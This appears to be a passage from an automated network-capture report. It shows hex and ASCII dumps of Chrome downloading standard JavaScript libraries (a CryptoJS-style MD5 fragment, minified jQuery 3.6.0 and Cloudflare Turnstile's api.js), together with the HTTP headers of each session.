                                                                                                                                                                                                          2024-12-11 23:28:54 UTC1369INData Raw: 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e
                                                                                                                                                                                                          Data Ascii: .charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMN
                                                                                                                                                                                                          2024-12-11 23:28:54 UTC1369INData Raw: 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74
                                                                                                                                                                                                          Data Ascii: s(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=t
                                                                                                                                                                                                          2024-12-11 23:28:54 UTC1369INData Raw: 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35
                                                                                                                                                                                                          Data Ascii: 9]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          10192.168.2.449754151.101.194.1374431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:28:54 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                          Host: code.jquery.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:28:54 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Content-Length: 89501
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                          ETag: "28feccc0-15d9d"
                                                                                                                                                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:28:54 GMT
                                                                                                                                                                                                          Age: 2481266
                                                                                                                                                                                                          X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740028-EWR
                                                                                                                                                                                                          X-Cache: HIT, HIT
                                                                                                                                                                                                          X-Cache-Hits: 2774, 1
                                                                                                                                                                                                          X-Timer: S1733959734.471665,VS0,VE5
                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                          2024-12-11 23:28:54 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                          2024-12-11 23:28:54 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                                                                                                          Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                                                                                                                          2024-12-11 23:28:54 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                                                                                                          Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                                                                                                          2024-12-11 23:28:54 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                                                                                                          Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                                                                                                          2024-12-11 23:28:54 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                                                                                                          Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                                                                                                          2024-12-11 23:28:54 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                                                                                                                          Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                                                                                                                          2024-12-11 23:28:54 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                                                                                                                          Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                                                                                                                          2024-12-11 23:28:54 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                                                                                                                          Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                                                                                                          2024-12-11 23:28:54 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                                                                                                          Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                                                                                                                          2024-12-11 23:28:54 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                                                                                                          Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          11192.168.2.449756104.18.95.414431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:28:55 UTC383OUTGET /turnstile/v0/g/f9063374b04d/api.js HTTP/1.1
                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          2024-12-11 23:28:56 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:28:56 GMT
                                                                                                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                          Content-Length: 47692
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          accept-ranges: bytes
                                                                                                                                                                                                          last-modified: Tue, 03 Dec 2024 18:31:41 GMT
                                                                                                                                                                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8f0940fdf8a07ce7-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          2024-12-11 23:28:56 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                                                                          Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                                                                                                                          2024-12-11 23:28:56 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                                                                                          Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                                                                                                          2024-12-11 23:28:56 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                                                                                                                          Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
